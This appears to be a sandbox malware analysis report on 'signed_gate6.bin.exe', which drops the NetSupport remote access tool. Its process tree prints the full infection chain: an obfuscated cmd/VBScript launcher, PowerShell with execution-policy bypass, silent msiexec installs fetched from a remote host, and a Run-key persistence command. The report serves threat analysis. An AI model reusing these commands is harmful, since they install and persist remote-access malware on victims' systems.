Analysis

  • max time kernel
    106s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    29-10-2020 16:41

General

  • Target

    signed_gate6.bin.exe

  • Size

    3.8MB

  • MD5

    5b31c8bf67eea804fa636876a1828d20

  • SHA1

    0f9862e659b5cd1233a7796d51e062d217df3c75

  • SHA256

    a61bc88a1a994952b622c7eb01bfa9be65591c8cb5e69c4dae56edbd94deb384

  • SHA512

    bf7175eb313fd1949e36056d478699327a05cbff1d5a0e68c4664df7c202197a25332ba270c8a5300367cf8d4b711d682d535071ce6c11ed125dd78c75f2909b

Malware Config

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Use of msiexec (install) with remote resource 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • JavaScript code in executable 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 67 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\signed_gate6.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\signed_gate6.bin.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ec^h^o CreateObject("Wscript.Shell").Run "cmd /c cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1", 0, False > %appdata%\NWNCDTYSWS.vb^s& wscript %appdata%\NWNCDTYSWS.vb^s& del %appdata%\NWNCDTYSWS.vb^s
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1572
      • C:\Windows\system32\wscript.exe
        wscript C:\Users\Admin\AppData\Roaming\NWNCDTYSWS.vbs
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:788
          • C:\Windows\system32\cmd.exe
            cmd /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1552
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\Dapino-Religion-People-Church.ps1
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1492
              • C:\Windows\system32\msiexec.exe
                "C:\Windows\system32\msiexec.exe" /i http://safuuf7774.pw/iplog/newg.php?hst=installing_TUICJFPF /q
                7⤵
                • Use of msiexec (install) with remote resource
                • Suspicious use of AdjustPrivilegeToken
                PID:552
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v fonthost /t REG_SZ /d C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe /f
                7⤵
                • Adds Run key to start application
                • Modifies registry key
                PID:1796
              • C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe
                "C:\Users\Admin\AppData\Roaming\W4mcAMtZ\fonthost.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1964
              • C:\Windows\system32\msiexec.exe
                "C:\Windows\system32\msiexec.exe" /i http://safuuf7774.pw/iplog/newg.php?hst=installed_TUICJFPF /q
                7⤵
                • Use of msiexec (install) with remote resource
                • Suspicious use of AdjustPrivilegeToken
                PID:1436
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blacklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:1792

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/552-37-0x00000000022C0000-0x00000000022C4000-memory.dmp

    Filesize

    16KB

  • memory/984-36-0x000007FEF7D20000-0x000007FEF7F9A000-memory.dmp

    Filesize

    2.5MB

  • memory/1436-35-0x00000000021B0000-0x00000000021B4000-memory.dmp

    Filesize

    16KB

  • memory/1492-11-0x0000000002280000-0x0000000002281000-memory.dmp

    Filesize

    4KB

  • memory/1492-12-0x000000001AC60000-0x000000001AC61000-memory.dmp

    Filesize

    4KB

  • memory/1492-13-0x0000000002430000-0x0000000002431000-memory.dmp

    Filesize

    4KB

  • memory/1492-17-0x000000001C3F0000-0x000000001C3F1000-memory.dmp

    Filesize

    4KB

  • memory/1492-10-0x000007FEF5C90000-0x000007FEF667C000-memory.dmp

    Filesize

    9.9MB

  • memory/1492-16-0x000000001C320000-0x000000001C321000-memory.dmp

    Filesize

    4KB

  • memory/1492-14-0x00000000025D0000-0x00000000025D1000-memory.dmp

    Filesize

    4KB

  • memory/1624-7-0x00000000026C0000-0x00000000026C4000-memory.dmp

    Filesize

    16KB